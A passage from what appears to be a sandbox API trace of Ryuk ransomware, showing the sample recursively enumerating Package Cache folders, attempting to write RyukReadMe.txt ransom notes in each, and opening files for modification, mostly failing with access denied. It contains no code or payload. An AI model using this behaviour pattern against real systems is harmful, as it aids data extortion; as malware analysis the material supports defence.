Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.671] GetLastError () returned 0x5 [0159.671] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.671] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.671] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.671] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.672] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.672] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.672] SetLastError (dwErrCode=0x0) [0159.672] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.672] GetLastError () returned 0x5 [0159.672] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.672] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.718] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.718] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.718] SetLastError (dwErrCode=0x0) [0159.718] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.718] GetLastError () returned 0x5 [0159.718] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.718] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.718] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.718] SetLastError (dwErrCode=0x0) [0159.718] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.719] GetLastError () returned 0x5 [0159.719] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.719] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.719] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.719] SetLastError (dwErrCode=0x0) [0159.719] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.719] GetLastError () returned 0x5 [0159.719] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.719] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.719] SetLastError (dwErrCode=0x0) [0159.719] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.719] GetLastError () returned 0x5 [0159.719] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.719] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.719] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.719] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.719] SetLastError (dwErrCode=0x0) [0159.719] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.720] GetLastError () returned 0x5 [0159.720] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.720] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.720] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.720] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.720] SetLastError (dwErrCode=0x0) [0159.720] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.720] GetLastError () returned 0x5 [0159.720] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.720] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.720] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.720] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.720] SetLastError (dwErrCode=0x0) [0159.720] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.721] GetLastError () returned 0x5 [0159.721] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.721] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.721] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.721] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.721] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.721] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.721] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.721] SetLastError (dwErrCode=0x0) [0159.721] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.721] GetLastError () returned 0x5 [0159.721] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.721] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.721] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.721] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.721] SetLastError (dwErrCode=0x0) [0159.721] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.722] GetLastError () returned 0x5 [0159.722] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.722] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.722] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.722] SetLastError (dwErrCode=0x0) [0159.722] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.722] GetLastError () returned 0x5 [0159.722] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.722] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.722] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.722] SetLastError (dwErrCode=0x0) [0159.722] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.722] GetLastError () returned 0x5 [0159.722] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.723] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.723] SetLastError (dwErrCode=0x0) [0159.723] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.723] GetLastError () returned 0x5 [0159.723] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.723] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.723] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.723] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.723] SetLastError (dwErrCode=0x0) [0159.723] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.723] GetLastError () returned 0x5 [0159.723] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.723] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.724] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.724] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.724] SetLastError (dwErrCode=0x0) [0159.724] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.724] GetLastError () returned 0x5 [0159.724] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.724] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.724] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.724] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.724] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.724] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.725] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.725] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.725] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.725] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.725] SetLastError (dwErrCode=0x0) [0159.725] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.725] GetLastError () returned 0x5 [0159.725] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.725] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.725] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.725] SetLastError (dwErrCode=0x0) [0159.725] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.725] GetLastError () returned 0x5 [0159.725] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.725] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.726] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.726] SetLastError (dwErrCode=0x0) [0159.726] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.726] GetLastError () returned 0x5 [0159.726] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.726] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.726] SetLastError (dwErrCode=0x0) [0159.726] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.726] GetLastError () returned 0x5 [0159.726] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.726] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.726] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.727] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.727] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.727] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.727] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.727] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.727] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.727] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.728] SetLastError (dwErrCode=0x0) [0159.728] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.728] GetLastError () returned 0x5 [0159.728] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.728] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.728] SetLastError (dwErrCode=0x0) [0159.728] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), 